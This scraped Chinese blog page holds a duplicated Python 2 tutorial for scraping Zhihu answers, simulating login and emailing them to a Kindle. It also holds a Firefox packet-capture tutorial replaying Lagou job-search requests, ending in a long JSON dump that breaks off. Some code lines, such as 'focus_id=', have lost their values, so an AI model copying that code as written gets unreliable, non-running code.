# 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

self.save2file(filename, title.string)


detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容,然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
print filename


class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()


if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574


# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle





 # -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()
 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
  查看全部
平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己的关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle


11.PNG



kindle.JPG
# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
def __init__(self, id):

# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
# 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

self.save2file(filename, title.string)


detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容,然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
print filename


class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()


if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574


# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle

知乎.PNG

 
# -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()

 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
 

Firefox抓包分析 (拉勾网抓包分析)

python爬虫低调的哥哥 发表了文章 • 16 个评论 • 19368 次浏览 • 2016-05-09 18:30 • 来自相关话题

针对一些JS网页,动态网页在源码中无法看到它的内容,可以通过抓包分析出其JSON格式的数据。 网页通过通过这些JSON数据对网页的内容进行填充,然后就看到网页里显示相关的内容了。
 
使用过chrome,firefox,wireshark来抓过包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
www.lagou.com 在左侧栏随便点击一个岗位,以android为例 
 





 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 





 
Post的信息就是我们需要关注的,点击post的链接
 





 
点击了Android之后 我们从浏览器上传了几个参数到拉勾的服务器
一个是 first =true, 一个是kd = android, (关键字) 一个是pn =1 (page number 页码)
 
所以我们就可以模仿这一个步骤来构造一个数据包来模拟用户的点击动作。post_data = {'first':'true','kd':'Android','pn':'1'}
然后使用python中库中最简单的requests库来提交数据。 而这些数据 正是抓包里看到的数据。import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data=requests.post(url,data=post_data)
print return_data.text

呐,打印出来的数据就是返回来的json数据{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 · 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 